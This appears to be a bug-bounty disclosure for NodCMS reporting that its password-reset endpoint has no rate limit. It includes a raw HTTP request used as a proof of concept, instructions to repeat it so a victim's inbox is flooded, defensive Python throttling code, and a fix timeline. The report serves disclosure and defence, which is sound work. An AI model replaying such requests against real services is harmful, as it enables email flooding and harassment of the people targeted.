Insufficient Granularity of Access Control in khodakhah/nodcms

Valid

Reported on

Sep 29th 2021


Description

There is no rate limit on the password-reset endpoint, so an unlimited number of emails can be sent to the victim or to any other email address.

Proof of Concept

There is no rate limit on return-password, so an attacker can send an unlimited number of emails to the victim or to any other email address.

POST /en/return-password HTTP/1.1
Host: demo.nodcms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://demo.nodcms.com
Connection: close
Referer: http://demo.nodcms.com/en/return-password
Cookie: ci_session=caa59553f10a9f15a8420e46308cc7a4d3582746

email=test@nodcms.com

Set the email= POST parameter to the victim's mail address. This request can be repeated an unlimited number of times, and the victim's address will receive an unlimited number of verification emails.
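The missing control on return-password is a throttle keyed on both the recipient address and the requesting client. The block below is an added illustration, not code from NodCMS (which is written in PHP): a sliding-window limiter placed in front of a password-reset handler, replayed against a constructed flood like the one in the proof of concept. The limits, the window length, the client IP 203.0.113.7, the fake clock and the in-memory "mailer" are all assumptions made for the example.

```python
import time
from collections import defaultdict, deque

# Constructed policy values (assumptions for this example, not NodCMS settings).
MAX_PER_EMAIL = 3       # reset mails one address may receive per window
MAX_PER_IP = 10         # reset requests one client IP may make per window
WINDOW_SECONDS = 3600


class SlidingWindowLimiter:
    """Allow at most `limit` events per key in any trailing `window` seconds."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock                  # injectable so tests can control time
        self.hits = defaultdict(deque)      # key -> timestamps of recent events

    def allow(self, key):
        now = self.clock()
        q = self.hits[key]
        while q and now - q[0] >= self.window:   # drop events outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class PasswordResetService:
    """Minimal stand-in for a return-password handler guarded by two limiters."""

    UNIFORM_REPLY = {"status": "success",
                     "message": "If this address is registered, a reset link has been sent."}

    def __init__(self, clock=time.monotonic):
        self.by_ip = SlidingWindowLimiter(MAX_PER_IP, WINDOW_SECONDS, clock)
        self.by_email = SlidingWindowLimiter(MAX_PER_EMAIL, WINDOW_SECONDS, clock)
        self.sent = []      # addresses a real mailer would have been asked to send to
        self.events = []    # audit lines a detection pipeline could consume

    def return_password(self, client_ip, email):
        key = email.strip().lower()         # normalise so case variants share one bucket
        # Client bucket first: one source cannot spray many distinct addresses.
        if not self.by_ip.allow(client_ip):
            self.events.append(f"ratelimit scope=ip ip={client_ip}")
            return 429, {"status": "error", "message": "Too many requests. Try again later."}
        # Recipient bucket: a throttled address gets the same reply as a fresh one,
        # so the response does not reveal whether the address exists or is throttled.
        if not self.by_email.allow(key):
            self.events.append(f"ratelimit scope=email email={key} ip={client_ip}")
            return 200, self.UNIFORM_REPLY
        self.sent.append(key)
        return 200, self.UNIFORM_REPLY


class FakeClock:
    """Deterministic clock for replaying a request timeline."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


def simulate_flood(requests):
    """Replay (timestamp, client_ip, email) tuples; return (mails sent, status codes)."""
    clock = FakeClock()
    svc = PasswordResetService(clock=clock)
    statuses = []
    for t, ip, email in requests:
        clock.now = float(t)
        status, _body = svc.return_password(ip, email)
        statuses.append(status)
    return svc.sent, statuses


if __name__ == "__main__":
    # Constructed flood: 20 requests in 20 seconds from one client at one address.
    flood = [(t, "203.0.113.7", "test@nodcms.com") for t in range(20)]
    sent, statuses = simulate_flood(flood)
    print(f"mails actually sent: {len(sent)} of {len(flood)} requests")
    print(f"status codes: {statuses}")
```

Replaying the proof-of-concept flood through `simulate_flood` shows the two controls working together: the recipient receives three mails instead of twenty, the first ten requests get the uniform success reply, and the client is cut off with 429 from the eleventh request until the window has elapsed. The `events` list is the natural place to feed a detection rule that alerts on repeated per-email throttling from a single source.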

Impact

An attacker can send an unlimited number of emails to any mail address.

We have contacted a member of the khodakhah/nodcms team and are waiting to hear back 2 months ago
khodakhah validated this vulnerability 2 months ago
Raptor has been awarded the disclosure bounty
The fix bounty is now up for grabs
khodakhah confirmed that a fix has been merged on 858590 2 months ago
The fix bounty has been dropped
Users.php#L191-L217 has been validated